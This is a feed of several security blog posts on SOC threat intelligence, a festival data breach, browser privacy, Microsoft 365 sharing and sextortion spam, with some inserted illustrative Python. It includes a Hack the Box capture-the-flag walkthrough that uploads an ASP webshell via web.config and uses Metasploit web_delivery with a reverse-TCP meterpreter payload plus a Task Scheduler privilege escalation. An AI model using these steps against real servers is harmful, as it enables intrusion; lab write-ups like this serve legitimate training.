But the numerous vital functions that SOC analysts perform — tasks like log monitoring, incident response, compliance, penetration and vulnerability testing, key and access management, and so on — can take years of experience to develop competency in. These diverse functions also often run on numerous disconnected systems, leaving analysts to deal with countless streams of data and alert feeds that can overwhelm even the most weathered security practitioner. Analysts yearn for a “single pane of glass” solution — one place where all the tasks they have to deal with show up with the context and timeliness they need to prioritize their work.

Threat intelligence is essential for making this picture a reality. Good threat intelligence provides exactly the context needed to enrich data feeds, reduce alert fatigue, and help SOC analysts work more efficiently and make informed decisions.

The following excerpt on this topic from “The Threat Intelligence Handbook” has been edited and condensed for clarity.

Threat Intelligence for Security Operations

Most security operations center (SOC) teams find themselves hostages to the huge volumes of alerts generated by the networks they monitor. Triaging these alerts takes too long, and many are never investigated at all. “Alert fatigue” leads analysts to take alerts less seriously than they should.

Threat intelligence provides an antidote to many of these problems. Among other uses, it can be employed to filter out false alarms, speed up triage, and simplify incident analysis.

Responsibilities of the SOC Team

On paper, the responsibilities of the SOC team seem simple:

  • Monitor for potential threats
  • Detect suspicious network activity
  • Contain active threats
  • Remediate using available technology

When a suspicious event is detected, the SOC team investigates, then works with other security teams to reduce the impact and severity of the attack. You can think of the roles and responsibilities within a SOC as being similar to those of emergency services teams responding to 911 calls.

The Overwhelming Volume of Alerts

Over the past several years, most enterprises have added new types of threat detection technologies to their networks. Every tool sounds the alarm when it sees anomalous or suspicious behavior. In combination, these tools can create a cacophony of security alerts. Security analysts are simply unable to review, prioritize, and investigate all these alerts on their own. Because of alert fatigue, all too often they ignore alerts, chase false positives, and make mistakes.

Research confirms the magnitude of these problems. Industry analyst firm ESG asked cybersecurity professionals about their biggest security operations challenge, and 35 percent said it was “keeping up with the volume of security alerts.” In its 2018 State of the SOC report, SIEM provider Exabeam revealed that SOCs are understaffed according to 45 percent of professionals who work in them, and of those, 63 percent think they could use anywhere from two to 10 additional employees. Cisco’s 2018 Security Capabilities Benchmark study found that organizations can investigate only 56 percent of the security alerts they receive on a given day, and of those investigated alerts, only 34 percent are deemed legitimate.

Context Is King

At its heart, threat intelligence for the SOC is about enriching internal alerts with the external information and context necessary to make risk-based decisions. Context is critical for rapid triage, and also very important for scoping and containing incidents.

Triage Requires Lots of Context

A huge part of an average SOC analyst’s day is spent responding to alerts generated by internal security systems, such as SIEM or EDR technologies. Sources of internal data are vital in identifying potentially malicious network activity or a data breach.

Unfortunately, this data is often difficult to interpret in isolation. Determining if an alert is relevant and urgent requires gathering related information (context) from a wide variety of internal system logs, network devices, and security tools, and from external threat databases. Searching all of these threat data sources for context around each alert is hugely time consuming.

Security Monitoring

Key aspects of security monitoring and internal sources of context. (Source: UK NCSC)

Improving the “Time to No”

As important as it is for SOC analysts to gather information about real threats more quickly and accurately, there is an argument to be made that the ability to rapidly rule out false alarms is even more important.

Threat intelligence provides SOC staff with additional information and context needed to triage alerts promptly and with far less effort. It can prevent analysts from wasting hours pursuing alerts based on:

  • Actions that are more likely to be innocuous rather than malicious
  • Attacks that are not relevant to that enterprise
  • Attacks for which defenses and controls are already in place

Some threat intelligence solutions automatically perform much of this filtering by customizing risk feeds to ignore or downgrade alerts that do not match organization- and industry-specific criteria.
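The filtering described above, enriching an alert with feed context and downgrading it when the actor, platform or an existing control make it irrelevant, can be sketched in a few dozen lines. This is an added example, not Recorded Future's code or any product's logic; the intel records, organization profile, alerts and score thresholds are all constructed for illustration.

```python
"""Alert-triage enrichment with threat-intelligence context.

Added example, not Recorded Future's code. The intel records, the
organization profile and the alerts are all constructed sample data.
"""
from dataclasses import dataclass, field

# Constructed threat-intel context, keyed by indicator. Each record carries
# the context the chapter says triage needs: source confidence, the sectors
# the actor is known to target, the platform its malware runs on, and the
# malware family, so the alert can be matched against existing controls.
INTEL = {
    "203.0.113.45": {"confidence": 90, "sectors": {"finance"},
                     "platform": "windows", "malware": "banker-loader"},
    "198.51.100.7": {"confidence": 30, "sectors": {"healthcare"},
                     "platform": "linux", "malware": "ssh-bruteforce"},
    "192.0.2.200": {"confidence": 85, "sectors": {"any"},
                    "platform": "windows", "malware": "ransomware-dropper"},
}

# Constructed organization profile: the organization- and industry-specific
# criteria used to downgrade alerts that are not relevant or already covered.
ORG = {
    "sector": "finance",
    # malware families for which a control is already in place
    "controls": {"ransomware-dropper": "blocked by EDR policy"},
}


@dataclass
class Alert:
    alert_id: str
    indicator: str      # the external IP the SIEM flagged
    host_platform: str  # OS of the internal host involved


@dataclass
class Verdict:
    alert_id: str
    score: int
    decision: str
    reasons: list = field(default_factory=list)


def triage(alert, intel=INTEL, org=ORG):
    """Enrich one alert with intel context and return a scored verdict.

    Starts from the feed's confidence and halves it for each mismatch with
    the organization (sector, platform); caps it low when a control already
    covers the malware family. Thresholds are illustrative.
    """
    ctx = intel.get(alert.indicator)
    if ctx is None:
        return Verdict(alert.alert_id, 0, "no-intel", ["indicator not in feed"])
    score = ctx["confidence"]
    reasons = []
    if "any" not in ctx["sectors"] and org["sector"] not in ctx["sectors"]:
        score //= 2
        reasons.append("actor does not target our sector")
    if ctx["platform"] != alert.host_platform:
        score //= 2
        reasons.append(f"malware targets {ctx['platform']}, host is {alert.host_platform}")
    if ctx["malware"] in org["controls"]:
        score = min(score, 20)
        reasons.append("control already in place: " + org["controls"][ctx["malware"]])
    if score >= 70:
        decision = "escalate"
    elif score >= 40:
        decision = "investigate"
    else:
        decision = "close"
    return Verdict(alert.alert_id, score, decision, reasons)


def summarize(verdicts):
    """Count decisions: the 'close' and 'no-intel' buckets are the alerts an
    analyst can dismiss on context alone (the 'time to no')."""
    counts = {}
    for v in verdicts:
        counts[v.decision] = counts.get(v.decision, 0) + 1
    return counts


if __name__ == "__main__":
    sample = [  # constructed alerts
        Alert("a1", "203.0.113.45", "windows"),
        Alert("a2", "198.51.100.7", "linux"),
        Alert("a3", "192.0.2.200", "windows"),
        Alert("a4", "203.0.113.45", "linux"),
        Alert("a5", "10.0.0.9", "windows"),
    ]
    verdicts = [triage(a) for a in sample]
    for v in verdicts:
        print(v.alert_id, v.score, v.decision, "; ".join(v.reasons))
    print(summarize(verdicts))
```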

Beyond Triage

As well as accelerating triage, threat intelligence can help SOC teams simplify incident analysis and containment.

For example, by revealing that a certain piece of malware is often used by cybercriminals as the first step in an attack on financial applications, the SOC team can start monitoring those applications more closely and home in on other evidence of that attack type.

Get The Threat Intelligence Handbook

The full chapter of the book also features an extensive use case looking at the value of enriching your data (as well as more helpful images and diagrams). Raw threat feeds don’t offer the context needed to evaluate whether an alert is critical to respond to or irrelevant (or a false positive). For analysts who have to respond to countless alerts daily, trying to triage an initial alert without access to enough context is like a person trying to understand a news story after reading just the headline.

To read the full chapter, including this use case, download your free copy of “The Threat Intelligence Handbook” today.

The post How to Empower Security Operations With Threat Intelligence appeared first on Recorded Future.


Tomorrowland festival goers affected by data breach

Tomorrowland, a major international music festival, has revealed a data breach potentially affecting around 60,000 attendees.

This one is a little different though, as the data accessed without permission isn’t recent. In fact, it dates back four years to an event long since come and gone. According to a Tomorrowland spokesperson, the managers of the Paylogic ticketing system noticed “unusual activity” on an older server. This server contained data for the 2014 event, but the hackers left everything else alone.

“Sensitive” versus “not sensitive”

The hacked server is now offline, and anyone potentially affected should have been made aware of what’s going to happen next. As with most breaches, it involves notification emails and a helpful set of suggestions for cybersecurity best practices.

Accounts conflict about what specifically was breached, accessed, and stolen in the Tomorrowland attack. This may be due to primary news sources being in languages other than English, with things being lost in translation.

Tomorrowland representatives claim access to sensitive data did not take place. This is where things become reliant on your personal definition of what constitutes “bad” or merely “sort of bad.”

Data taken includes name, email, gender, age, and post code. Data not taken includes payment details, passwords, and addresses.

I suspect everyone’s mileage may vary greatly with regards to what constitutes “sensitive data” here. Depending on which region of the world you come from, a post code alone could drill you down to a couple of houses or a single street. At that point, the specific address probably doesn’t matter too much. With the post code and a name, you could easily find the exact house via publicly-listed information, a voting register, or a house sale.

That seems pretty sensitive to me.

Phishing risks

A dubious phishing attempt is more than doable here as a result of the data taken by scammers. Any communications regarding ticket sales, offers, promotions, or anything else you can think of should be greeted with a healthy dose of suspicion.

Revisit your mailbox and check for any interactions with event organisers the moment you receive any official communications. Have a look at anything you’ve replied to related specifically to Tomorrowland. In particular, pay attention to anything involving payments, password resets, or submission of further personal information. Ignore all rogue emails and send them straight to the recycling bin.

Without further information on when the breach took place, it’s difficult to say how long people should be concerned. We don’t know if the unauthorised access took place last week, last month, or last year. We can’t say how long people were sitting on the stolen information, or if it’s old news for scammers. Potentially, anything worthwhile in the haul has long since stopped being relevant or useful.

Pulling the plug: a good idea

It’s odd that a server containing data from a one-off event in 2014 was still online. Despite this, it’s entirely possible it was online for specific reasons we can’t guess at. Even so, it’s a good cautionary warning to remind admins to take anything offline that doesn’t really need to be there. Even data that should definitely be online for various reasons will often fall victim to attacks and scams.

A full audit, a sensible backup policy, and old data stored securely will solve a lot of these potential headaches. Everybody likes a music festival to be as eventful as possible, but this is perhaps a little too eventful. We hope you experience zero breaches, sensibly priced burgers, and permanently short queues for an abundance of portable toilets.

The post Tomorrowland festival goers affected by data breach appeared first on Malwarebytes Labs.

How to tighten security and increase privacy on your browser

Is my browser making an effort to keep my system safe and my online behavior private? This is usually not the first question we ask ourselves when we choose our default browser. But maybe it should be.

These days, threats to your privacy and security come at you from all angles, but browser-based attacks such as malvertising, drive-by downloads, adware, tracking, and rogue apps make going online and conducting a search a little more dangerous. Therefore, it’s important to take note of what browsers are doing to shore up their defenses—and what you can do to optimize them.

When it comes to online privacy, it looks as if the silent majority of Internet users have shifted from the “I have nothing to hide” frame of mind to the “they already know everything anyway” group. And based on recent events, many social media users might be right. Effectively, both groups feel as though it is not worth the trouble to jump through hoops to keep their data private. So should this even be a consideration?

While privacy is ultimately a personal choice, we believe it is still a right. So we’ll continue to offer our advice for those who are interested.

But let’s look at the security aspect first. This is something we can all agree on.

Browser security measures

There have been a few initiatives taken recently by the major browsers to enhance their safety.

  • Google has decided that Chrome extensions submitted to the Web Store will not be allowed if they contain “obfuscated” code. According to Google, developers should not have to hide their code. It makes it hard to decide whether they should allow the extension, and most obfuscated extensions turned out to be malicious.
  • Google is in the process of putting an end to “inline installation” of extensions. This means websites can no longer directly install Chrome extensions using the Chrome API, but have to send you to the Web Store. While this process will only be finished by the end of the year, distributors have already adapted their methods to deliver their extensions.
  • Mozilla (Firefox), Google (Chrome), Apple (Safari), and Microsoft (Edge and Internet Explorer) have announced they will drop support for the TLS (Transport Layer Security) 1.0 and 1.1 encryption protocols in early 2020. This will force websites to start using the newer and more secure protocols.
  • WebRTC leaks and vulnerabilities were solved. Real-time communication features could expose your true IP address via STUN requests with Firefox, Chrome, Opera and Brave browsers, even when you were using a VPN.

In earlier stages of privacy and security audits, all the major browsers had already added options and features like URL filtering, download protection, “do not track” capabilities, and measures against browlocks. They are not all using the same methods, and some are more effective than others, but the efforts were made nonetheless.

Remaining problems

Despite all the attempts to apply some pest-control on adware, malicious cryptominers, and other assorted browser hijackers, there will always be those that manage to slither through and infect users. And that doesn’t even take into account the multitude of potentially unwanted programs (PUPs) that most parties don’t even seem to care about at all. However, readers of this blog will undoubtedly know the way to our Malwarebytes products page, where they can download a cure for an infected browser.

Besides the obvious ramifications of an adware, PUP, or hijacker infection, there is still more work left to do for those of us who value our online privacy.

Browser privacy

The upside of being able to use browser extensions is that there are many good ones out there that can help you establish a more private browsing experience. Ad-blockers, anti-tracking tools, and protective extensions add further protection.

You can also tighten your privacy by using a Virtual Private Network (VPN) to anonymize your traffic. You have options here, since you can install a VPN to anonymize all your Internet traffic, or you can install a VPN extension that will do so for your browser only. Since a VPN slows down the Internet connection, the choice will be based on which other Internet connections you use and your personal preference.

You could even decide to use one browser with a VPN extension and another without one. Personally, I use different browsers for different purposes. This is called compartmentalization and it allows you to visit trusted (and preferably bookmarked) websites with a quick browser and do your regular surfing with a fully protected and anonymized browser.

Besides using a VPN, you can also look at some alternative browsers that are already optimized for privacy and security:

  • The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world.
  • Freenet is a peer-to-peer platform for censorship-resistant communication and publishing that is available for Windows, macOS, and Linux.
  • Waterfox is a secure and private browser based on Firefox that allows you to use Firefox extensions. It is available for Windows, macOS, Linux, and Android.
  • Pale Moon is another Mozilla fork, but it doesn’t work with all Firefox extensions. It is available for Windows and Linux.
  • Brave is a Chromium-based browser that blocks unwanted content by default and does not need much tinkering to keep you safe and private. Brave is available for Windows, macOS, Linux, iOS, and Android.

Anonymous searching

We have talked about (not so) private search extensions before, but I want to mention a search engine that does deliver on the promised private searches, and that was brought up in the comments to that blogpost (thanks Patrick). It is called DuckDuckGo, and you can perform searches directly from their site or you can install their app or extension.

Test to see whether your browser is safe against fingerprinting

Browser fingerprinting is a method used by commercial websites to uniquely identify visitors based on the way you have configured your browser and some other metrics that they can fetch from your browser, such as timezone.

If you feel you have already done your best to make your browser untrackable, pay this site a visit. It provides visitors with an option to run a test and analyze how well their browser and add-ons protect them against online tracking techniques. The site will also be able to see if your system is uniquely configured and therefore identifiable, even if you are using privacy-protective software.

Don’t get hung up on the test result alone though, because the number of results you are compared with plays a big role in the outcome. For example, coming from a small country or language area may give you away when no one else from that area has taken the test. This doesn’t automatically mean advertisers will be able to track you as well. Do pay attention to the specified fingerprinting results. You can access those by clicking on the fingerprinting link in the Test column.


Blocking advertisements

As we have explained in the blogpost Everybody and their mother is blocking ads, so why aren’t you?, blocking advertisements provides a vital security layer that not only severs a potential vector for online malvertising attacks, but also blocks privacy-invading tracking plugins from collecting and harvesting your personal information.


Cookies are another topic that we have discussed earlier. Most cookies are not worth worrying about, but it is a good idea to be aware of them. How could you not be aware with every site asking your permission, right? In the blogpost Cookies: Should I worry about them?, we have explained how you can check and control the cookies that you want to allow.

Level of concern

So, while many major browsers are doing their best to keep you secure and private, it depends on your own level of concern how far you want to take this journey. There are specialized browsers, extensions, search engines, and other tools to help you achieve any level of privacy. Most people will be satisfied by customizing their mainstream browser to fit their needs, while others wouldn’t think of going online unless they are using Tor behind a VPN. To each their own. As long as you are aware of the risks. And we hope this post will help you to achieve the level you are after.

Stay safe, everyone!

The post How to tighten security and increase privacy on your browser appeared first on Malwarebytes Labs.

How to share content easily and securely

This is the seventh post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Cumbersome restrictions and limitations on mobile devices, apps, and remote access can be taxing from an IT perspective and frustrating for your employees. Your users need to be able to create, access, and share files from anywhere, and IT needs to ensure that these actions won't compromise your company's security.

Microsoft 365 offers security solutions that help secure your collaboration and productivity apps. That way your employees can connect and communicate wherever they are, using tools they are familiar with, as securely as if they were right at their desks.

How can I securely share documents outside my organization?

Classify documents based on content sensitivity

First, classify documents using Azure Information Protection (AIP). With AIP, you can configure policies to classify, label, and protect data based on its sensitivity. Data can be classified according to standards you define for content, context, and source. These classifications can then be applied automatically or manually, or you can prompt your employees to decide what classification to apply with in-product suggestions.

To classify documents using AIP, you must first configure your company's classification policy. Configure the policy by signing in to the Azure portal as an administrator and then selecting Azure Information Protection in the apps list. All AIP users start with a default policy that you can configure to suit your needs. Once you have created the policy that works best, publish your changes to deploy the policy to all managed apps and devices.

Use email to share files

Your employees can use email file attachments in Microsoft Outlook to share files. With Outlook, users can take files from their business or personal device, attach files to an email, and access a dedicated library where all group files are stored. If your employees need to send a sensitive message to external users, they can increase security by encrypting the message using Office 365 Message Encryption and the message recipient will decrypt the message using the Office 365 Message Encryption viewer.

Enable users to collaborate

To ensure that shared documents are only viewed by the right person, your users can share files with internal or external partners through OneDrive for Business and apply security features such as password protection and Multi-Factor Authentication.

Microsoft Teams, a chat-based workspace, enables teams to be more productive by giving them a single and secure location that brings together everything a team needs in one hub, including chats, meetings, calls, files, and tools. Azure Active Directory (Azure AD) conditional access policies can be configured to secure the data in Teams. You can deploy Teams through Microsoft System Center Configuration Manager (ConfigMgr) or Microsoft Intune.

Yammer helps your users improve engagement with everyone in your organization through social networking. Use the security features in Yammer to help protect sensitive organizational data. Yammer supports Azure AD single sign-on authentication, allows admins to set password policies, and provides admins with session management tools that let you see the devices users are signed in to. You can manage access and permissions in Yammer by setting up the Yammer network to comply with your organization's standards.

Identify risky applications and shadow IT

Microsoft Cloud App Security allows you to more securely share documents via third-party applications by identifying the cloud apps on your network. By gaining visibility into shadow IT, you can help protect your information using policies for data sharing and data loss prevention.

How can I work on documents across devices securely?

To work more securely across different devices you will need to manage your mobile devices and set app protection policies. You can use Intune to manage your users' mobile devices. To help prevent data loss, you will want to protect company data that is accessed from devices that you don't manage. You can apply Intune app protection policies that restrict access to company resources and keep company and personal data from getting intermingled. Company data can otherwise end up in locations like personal storage, or be transferred to apps beyond your purview, and result in data loss. App protection policies can be used to prevent company data from being saved to the local storage of an unmanaged device or moved to other apps that aren’t protected by app protection policies.

Deployment tips from our experts

Enable security features in Office 365 apps: Office 365 apps like Outlook, OneDrive, Teams, and Yammer all come with built-in features that enable users to more securely share files and be productive. A few simple things you can do include:

Classify and share documents securely: Classify documents in AIP to track and control how information is used. Then share documents securely via third-party applications using Microsoft Cloud App Security to protect your information.

Prevent data loss on mobile devices: Manage mobile devices with Intune and through mobile device management. Then implement app-level controls with Intune app protection policies to help prevent data loss.

Plan for success with Microsoft FastTrack: FastTrack comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Store and share files inside and outside your organization to work securely across organizational boundaries. You can find additional security resources on

Coming Soon! Using controls for security compliance will be the last installment of our Deploying intelligent scenarios series. In November, we will kick off a new series: Top 10 security deployment actions with Microsoft 365 Security.

More blog posts from this series:

The post How to share content easily and securely appeared first on Microsoft Secure.

Hack the Box: Bounty Walkthrough

Today we are going to solve another CTF challenge, “Bounty”. It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Medium

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of Bounty is


Let’s start off with our basic nmap command to find out the open ports and services.

nmap -A

Things to observe from its result: port 80 is open for HTTP, and the service banner is Microsoft-IIS/7.5.

Let’s navigate to port 80 through a web browser. Entering the IP in the URL bar brings up the web page shown in the image below.

Since we didn’t get any remarkable clue from the home page, we opted for the Dirbuster tool for directory enumeration, using the directory-list-2.3-medium.txt wordlist.

Hmm!! Here I received HTTP responses for the /transfer.aspx file and the /uploadedFiles directory.

Exploring /transfer.aspx in the browser brings up the web page shown below, which lets you upload a file.

We made many attempts to upload a file, but every time we got the message “Invalid File. Please try again”.

After so many efforts, I found this link on googling “IIS 7.5 rce upload”. Here we read about the web.config file, which plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in the Apache web server. Uploading a .htaccess file to bypass protections around uploaded files is a known technique.

So with the help of the above link we create a web.config file containing ASP code that will respond with the sum of 1 and 2.

As you can observe, our web.config file is successfully uploaded inside /uploadedfiles/ directory.

When we executed this file, it gave the expected response “3”, which is the sum of 1 and 2. Hence we can now inject code into this file and gain RCE through it.
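The web.config trick works because the upload filter only looks for obvious script extensions, so a server configuration file sails through. As an added example, not the lab's or the author's code, here is that denylist pattern beside an allowlisted check that rejects reserved configuration names and double extensions and never stores a file under the client-supplied name; all filenames are constructed.

```python
"""Upload filename checks: the denylist pattern that lets web.config through,
beside an allowlisted version that rejects it.

Added example, not the lab's or the author's code; filenames are constructed.
"""
import os
import re
import secrets

# Weak: denies the obvious script extensions and nothing else. A server
# configuration file such as web.config (IIS) or .htaccess (Apache) passes,
# yet once it lands in the upload directory the server treats it as live
# settings for that directory, which is the gap the walkthrough relies on.
DENIED_EXTENSIONS = {".asp", ".aspx", ".ashx", ".php", ".jsp", ".exe"}


def denylist_allows(filename):
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENIED_EXTENSIONS


# Hardened: allowlist what may be stored, reject reserved configuration
# names explicitly, and never reuse the client's name on disk.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}
RESERVED_NAMES = {"web.config", ".htaccess", ".htpasswd", "global.asax"}
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # no dots: blocks double extensions


def validate_upload(filename):
    """Return (True, storage_name) or (False, reason)."""
    # Keep only the final path component, whichever separator the client used.
    name = os.path.basename(filename.replace("\\", "/")).strip()
    if not name or name.lower() in RESERVED_NAMES:
        return False, "reserved or empty filename"
    base, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} not allowed"
    if not SAFE_BASENAME.match(base):
        return False, "basename contains disallowed characters"
    # Random server-chosen name carrying only the vetted extension; the upload
    # directory should additionally be served with script execution disabled.
    return True, secrets.token_hex(8) + ext


if __name__ == "__main__":
    for f in ["web.config", "shell.aspx", "shell.aspx.png", "photo.PNG"]:  # constructed
        print(f"{f:16} denylist_allows={denylist_allows(f)!s:5} allowlist={validate_upload(f)}")
```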

Luckily!! I found this link for an ASP webshell. So I copied the whole content of the ASP webshell into our web.config file and uploaded it.

On executing the updated web.config file, it presents a form through which we can run commands on the server. Here we will be executing the PowerShell code generated via the web_delivery module of Metasploit.

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set srvhost
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > run

Paste the highlighted code shown in the Metasploit image into the text field and run it to get a meterpreter session.

Great!! We have successfully got a meterpreter session on the victim’s machine; now let’s find the user.txt file to finish this task.

We successfully found the user.txt file inside /users/merlin/Desktop. Next we need to find the root.txt file to finish this challenge, and as we know, for that we need to escalate our privileges.

Then I ran the post-exploitation module “Multi Recon Local Exploit Suggester”, which suggests local exploits that can be used for further exploitation. The exploits are recommended based on the architecture and platform on which the user has a shell open, as well as the exploits available in Metasploit.

msf > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit

Wonderful!! Exploit Suggester truly proved itself by suggesting exploits to which the target is vulnerable. We will go with the first option, as highlighted in the image.

This vulnerability in Task Scheduler could allow elevation of privileges. The module has been tested on vulnerable builds of Windows Vista, Windows 7, and Windows Server 2008 x64 and x86.

use exploit/windows/local/ms10_092_schelevator
msf post(windows/local/ms10_092_schelevator) > set lhost
msf post(windows/local/ms10_092_schelevator) > set lport 5555
msf post(windows/local/ms10_092_schelevator) > set session 1
msf post(windows/local/ms10_092_schelevator) > exploit

Once the selected exploit has run, another meterpreter session opens.

As we can see, we are now running as the privileged Windows account NT AUTHORITY\SYSTEM.

We successfully found root.txt at C:\Users\Administrator\Desktop.

Wonderful! We have completed both tasks and hacked this box.

Happy Hacking!!!!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Hack the Box: Bounty Walkthrough appeared first on Hacking Articles.

Website Security Tips for Marketers

In our previous post, we discussed why marketers should take a proactive approach to website security. Today we are going to discuss some security tips marketers can put into practice. In the simplest terms, website security means three things here at Sucuri:

  • Protecting your website from compromises.
  • Monitoring for issues so you can react quickly.
  • Having a documented emergency response plan.

Marketers should champion these initiatives so they can be prioritized by their business development team.

Continue reading Website Security Tips for Marketers at Sucuri Blog.

Anatomy of a sextortion scam

This blog was written by Jaeson Schultz.

Since July, attackers have increasingly been spreading sextortion-type attacks across the internet. Cisco Talos has been investigating these campaigns over the past few months. In many cases the spammers harvested email addresses and passwords from a publicly available data breach, and then used this data to facilitate their sextortion attacks. While the attackers do not actually have any compromising videos of the victim, the emails claim to have explicit videos that they will distribute if the victim doesn't pay the extortion demand by a certain time. By including the recipient's password along with their demands for payment, the attackers hope to legitimize their claims about having compromising material concerning the victim. While these attacks have been in the wild for months, Talos wanted to take a closer look at some of these campaigns to see why users were being tricked into sending the attackers large amounts of bitcoin despite the attackers' empty threats. By examining some of the sextortion spam campaigns in detail, our researchers were able to gain insight into how these criminals operate.

An example of a sextortion email containing slight changes to the wording of the message body.

Sextortion Campaign Analysis

To facilitate a deeper understanding of sextortion scams, Talos extracted and analyzed messages related to two very similar sextortion spam campaigns. The first spam campaign we analyzed began on Aug. 30, 2018, and the second campaign began Oct. 5, 2018. Both campaigns are still active at the time of writing this blog.

Talos extracted all messages from these two sextortion campaigns that were received by SpamCop from Aug. 30, 2018 through Oct. 26, 2018 — 58 days' worth of spam. Every message sent as a part of these two sextortion campaigns contains a From: header matching one of the following two regular expressions:

From =~ /Aaron\d{3}Smith@yahoo\.jp/
From =~ /Aaron@Smith\d{3}\.edu/

Campaign Totals

In total, SpamCop received 233,236 sextortion emails related to these "Aaron Smith" sextortion campaigns. The messages were transmitted from 137,606 unique IP addresses. The vast majority of the sending IP addresses, 120,659 sender IPs (87.7 percent), sent two or fewer messages as a part of this campaign.

Number of sextortion emails received by SpamCop over time

The sending IPs are distributed among many countries; however, roughly 50 percent of the sextortion messages come from only five countries: Vietnam (15.9 percent), Russia (15.7 percent), India (8.5 percent), Indonesia (4.9 percent) and Kazakhstan (4.7 percent). If some of these countries seem familiar, that may be because India and Vietnam were previously identified as having exceedingly large numbers of machines that are infected with the Necurs botnet, a well-known distributor of many pieces of malware.

Distribution of sender IP addresses by country

Despite sending more than 233,000 email messages as part of these campaigns, the number of unique recipients was actually fairly low. Talos found only 15,826 distinct victim email addresses. This means that the attackers were sending an average of almost 15 sextortion spam messages per recipient. One unlucky victim from our dataset was contacted a staggering 354 times.

Payment demands

Each sextortion spam contains a payment demand. The payment requested by the attackers varies according to the specific campaign, but in this instance, it is a randomly generated number consisting of an integer between one and seven, followed by three zeros ($1,000 - $7,000). These six different payment amounts appear with almost identical frequency across the entire set of emails, suggesting that there was no effort made on the part of the attackers to tailor their payment demands to individual victims.

Cryptocurrency wallets

In addition to the payment demand, each sextortion message also contains a bitcoin (BTC) wallet address to receive the payment from the victim. In total, Talos identified 58,611 unique bitcoin wallet addresses associated with these two spam campaigns. This works out to an average of approximately four sextortion messages per bitcoin wallet. Out of the approximately 58,000 bitcoin wallets, only 83 wallets have positive balances. However, the balances in those 83 wallets add up to 23.3653711 bitcoins, the equivalent of $146,380.31. That isn't too bad considering the attackers have only been distributing this particular scam for roughly 60 days, and do not actually possess any compromising material concerning the victim.

If you look at the number of unique bitcoin wallets and unique victim email addresses seen over time, you can see that the attackers periodically inject their ongoing campaign with fresh data. The number of unique bitcoin wallets tends to peak and then reduce over time, until it peaks again, with another fresh batch of attacker-generated bitcoin wallets. The last major injection of fresh wallet addresses occurred on Oct. 9. The same can be seen regarding unique message recipients over time, with what appears to be a large injection of fresh recipients also occurring around Oct. 9.

Unique versus duplicate bitcoin wallets and recipient email addresses

Unfortunately, as we dug further into the individual bitcoin wallets possessing positive balances, we noticed some oddities regarding the wallet payment amounts. Several wallets had received transfers that fell well under the minimum $1,000 payment that was demanded as part of this specific campaign. The payment amounts were low enough to fall outside the realm of what could be logically explained as a result of fluctuations in the price of bitcoin.

Bitcoin wallet found in the Aaron Smith sextortion spam that contains far less than the minimum demand of $1,000.

Our researchers discovered that some of the wallets used in this attack were also being used in other attacks. The attackers were reusing some of their bitcoin wallet addresses across different spam campaigns.

In light of the attackers' bitcoin wallet reuse, Talos decided to expand our research to include all spam messages that mention "bitcoin," while also possessing a string of 26-35 characters resembling a bitcoin wallet address in the body of the email.
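To make the two filters used in this analysis concrete, here is an added example (my own code, not Talos's tooling) that applies the From: header patterns given earlier and the wallet-address heuristic from the widened search to a handful of constructed messages. The sender and recipient addresses and message bodies are constructed; the two wallet strings quoted in this post and the well-known bitcoin genesis-block address appear only as sample inputs. The Base58Check checksum test goes beyond what the post describes: it separates real legacy addresses from random strings that merely look like one, which matters when a 26-35 character regex is run over large volumes of spam.

```python
import hashlib
import re
from collections import Counter

# The two From: header patterns Talos used to pick out the "Aaron Smith" campaigns.
CAMPAIGN_FROM_PATTERNS = [
    re.compile(r"Aaron\d{3}Smith@yahoo\.jp"),
    re.compile(r"Aaron@Smith\d{3}\.edu"),
]

# A 26-35 character string that looks like a legacy (Base58) bitcoin address:
# starts with 1 or 3 and uses the Base58 alphabet (no 0, O, I or l).
BTC_CANDIDATE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def is_valid_btc_address(candidate):
    """Base58Check test (added filter, not part of the post): decode to 25 bytes
    and verify that the last 4 bytes equal the start of sha256(sha256(payload))."""
    n = 0
    for ch in candidate:
        digit = B58_ALPHABET.find(ch)
        if digit < 0:
            return False
        n = n * 58 + digit
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    # Each leading '1' encodes a leading zero byte (the 0x00 P2PKH version byte).
    leading_zeros = len(candidate) - len(candidate.lstrip("1"))
    payload = b"\x00" * leading_zeros + body
    if len(payload) != 25:
        return False
    checksum = hashlib.sha256(hashlib.sha256(payload[:21]).digest()).digest()[:4]
    return checksum == payload[21:]


def is_campaign_message(from_header):
    """True when the From: header matches one of the campaign patterns."""
    return any(p.search(from_header) for p in CAMPAIGN_FROM_PATTERNS)


def analyze(messages):
    """Summarise a batch of messages the way the post does: campaign hits,
    unique recipients, messages per recipient, and wallet strings seen in any
    message that mentions "bitcoin" (the widened search)."""
    campaign = [m for m in messages if is_campaign_message(m["from"])]
    per_recipient = Counter(m["to"] for m in campaign)
    wallets = Counter()
    for m in messages:
        if "bitcoin" in m["body"].lower():
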